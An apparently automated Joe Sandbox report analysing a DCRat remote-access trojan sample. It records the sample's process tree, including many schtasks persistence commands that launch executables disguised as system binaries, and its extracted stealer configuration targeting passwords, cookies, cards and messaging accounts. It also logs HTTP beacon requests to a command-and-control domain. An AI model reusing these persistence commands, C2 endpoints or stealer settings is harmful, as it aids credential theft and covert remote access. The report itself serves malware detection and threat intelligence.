Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rWjaZEKha8.exe

Overview

General Information

Sample name:rWjaZEKha8.exe
renamed because original name is a hash value
Original sample name:5D579285E5EFDF6DE25DA8D83D7AA9BE.exe
Analysis ID:1581448
MD5:5d579285e5efdf6de25da8d83d7aa9be
SHA1:09c112d891262a4967f5fd7e864b4cc040297858
SHA256:c03fa0ee0fe28bde170f78b55cfa13a61dde423d9f66e3fbd8bb53dd3c0c1fb4
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Drops PE files to the user root directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • rWjaZEKha8.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\rWjaZEKha8.exe" MD5: 5D579285E5EFDF6DE25DA8D83D7AA9BE)
    • wscript.exe (PID: 7716 cmdline: "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7808 cmdline: C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • intoDhcp.exe (PID: 7860 cmdline: "C:\bridgehyperperfdhcp\intoDhcp.exe" MD5: 889D38A4230664BEFDBB3D1528E08DF2)
          • schtasks.exe (PID: 7920 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7936 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7952 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7984 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8000 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8020 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8036 cmdline: schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8052 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8068 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8088 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8104 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8120 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8144 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8160 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8184 cmdline: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7248 cmdline: schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7284 cmdline: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7364 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 8 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7420 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7404 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7472 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3340 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3448 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2872 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1216 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 564 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5856 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5804 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7596 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2316 cmdline: schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7336 cmdline: schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7492 cmdline: schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 5320 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Idle.exe (PID: 8136 cmdline: "C:\Program Files\Windows Portable Devices\Idle.exe" MD5: 889D38A4230664BEFDBB3D1528E08DF2)
  • Idle.exe (PID: 8168 cmdline: "C:\Program Files\Windows Portable Devices\Idle.exe" MD5: 889D38A4230664BEFDBB3D1528E08DF2)
  • OjTEkrTlLyhdt.exe (PID: 7232 cmdline: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe MD5: 889D38A4230664BEFDBB3D1528E08DF2)
  • OjTEkrTlLyhdt.exe (PID: 3060 cmdline: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe MD5: 889D38A4230664BEFDBB3D1528E08DF2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"1\":\"&\",\"h\":\"-\",\"S\":\"`\",\"i\":\"|\",\"W\":\"*\",\"A\":\".\",\"0\":\" \",\"C\":\"_\",\"d\":\">\",\"J\":\";\",\"M\":\")\",\"5\":\"~\",\"6\":\"^\",\"2\":\"(\",\"I\":\",\",\"o\":\"<\",\"z\":\"$\",\"L\":\"@\",\"k\":\"!\",\"H\":\"%\",\"P\":\"#\"}", "PCRT": "{\"Q\":\"^\",\"0\":\"&\",\"Z\":\"~\",\"m\":\"`\",\"R\":\">\",\"v\":\"<\",\"F\":\".\",\"U\":\" \",\"k\":\"%\",\"3\":\")\",\"H\":\"$\",\"d\":\"@\",\"B\":\"(\",\"M\":\"|\",\"Y\":\"_\",\"V\":\";\",\"y\":\"#\",\"T\":\"!\",\"r\":\",\",\"o\":\"*\",\"W\":\"-\"}", "TAG": "", "MUTEX": "DCR_MUTEX-IuDxRkiH9WGLnOdm8OhB", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1750999526.0000000003622000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000015.00000002.1857787065.0000000002611000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000004.00000002.1750999526.00000000032D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000012.00000002.1838389619.0000000002A61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000017.00000002.1838727941.00000000028F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 7 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\bridgehyperperfdhcp\intoDhcp.exe, ProcessId: 7860, TargetFilename: C:\Program Files (x86)\microsoft office\dasHost.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\rWjaZEKha8.exe", ParentImage: C:\Users\user\Desktop\rWjaZEKha8.exe, ParentProcessId: 7676, ParentProcessName: rWjaZEKha8.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe" , ProcessId: 7716, ProcessName: wscript.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: rWjaZEKha8.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://a1067345.xsph.ru/Avira URL Cloud: Label: malware
            Source: http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQAvira URL Cloud: Label: malware
            Source: http://a1067345.xsph.ruAvira URL Cloud: Label: malware
            Source: http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\GoElC7XtGN.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Program Files (x86)\Microsoft Office\dasHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows Portable Devices\upfc.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows Portable Devices\Idle.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Found malware configuration
            Source: 00000004.00000002.1752275310.00000000132DF000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"1\":\"&\",\"h\":\"-\",\"S\":\"`\",\"i\":\"|\",\"W\":\"*\",\"A\":\".\",\"0\":\" \",\"C\":\"_\",\"d\":\">\",\"J\":\";\",\"M\":\")\",\"5\":\"~\",\"6\":\"^\",\"2\":\"(\",\"I\":\",\",\"o\":\"<\",\"z\":\"$\",\"L\":\"@\",\"k\":\"!\",\"H\":\"%\",\"P\":\"#\"}", "PCRT": "{\"Q\":\"^\",\"0\":\"&\",\"Z\":\"~\",\"m\":\"`\",\"R\":\">\",\"v\":\"<\",\"F\":\".\",\"U\":\" \",\"k\":\"%\",\"3\":\")\",\"H\":\"$\",\"d\":\"@\",\"B\":\"(\",\"M\":\"|\",\"Y\":\"_\",\"V\":\";\",\"y\":\"#\",\"T\":\"!\",\"r\":\",\",\"o\":\"*\",\"W\":\"-\"}", "TAG": "", "MUTEX": "DCR_MUTEX-IuDxRkiH9WGLnOdm8OhB", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
            Multi AV Scanner detection for dropped file
            Source: C:\Program Files (x86)\Microsoft Office\dasHost.exeReversingLabs: Detection: 76%
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exeReversingLabs: Detection: 76%
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeReversingLabs: Detection: 76%
            Source: C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exeReversingLabs: Detection: 76%
            Source: C:\Program Files\Windows Portable Devices\Idle.exeReversingLabs: Detection: 76%
            Source: C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exeReversingLabs: Detection: 76%
            Source: C:\Program Files\Windows Portable Devices\upfc.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\3D Objects\OjTEkrTlLyhdt.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\OjTEkrTlLyhdt.exeReversingLabs: Detection: 76%
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeReversingLabs: Detection: 76%
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeReversingLabs: Detection: 76%
            Multi AV Scanner detection for submitted file
            Source: rWjaZEKha8.exeReversingLabs: Detection: 73%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeJoe Sandbox ML: detected
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeJoe Sandbox ML: detected
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeJoe Sandbox ML: detected
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeJoe Sandbox ML: detected
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft Office\dasHost.exeJoe Sandbox ML: detected
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exeJoe Sandbox ML: detected
            Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Portable Devices\upfc.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Portable Devices\Idle.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: rWjaZEKha8.exeJoe Sandbox ML: detected
            Source: rWjaZEKha8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\db8cdfc8abc352Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\Idle.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\6ccacd8608530fJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\upfc.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\ea1d8f6d871115Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Mail\db8cdfc8abc352Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\MSBuild\db8cdfc8abc352Jump to behavior
            Source: rWjaZEKha8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: rWjaZEKha8.exe
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0017A5F4
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0018B8E0
            Source: Joe Sandbox ViewIP Address: 141.8.197.42 141.8.197.42
            Source: Joe Sandbox ViewIP Address: 141.8.197.42 141.8.197.42
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1067345.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1067345.xsph.ru
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1067345.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1067345.xsph.ru
            Source: global trafficDNS traffic detected: DNS query: a1067345.xsph.ru
            Source: Idle.exe, 00000015.00000002.1857787065.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1067345.xsph.ru
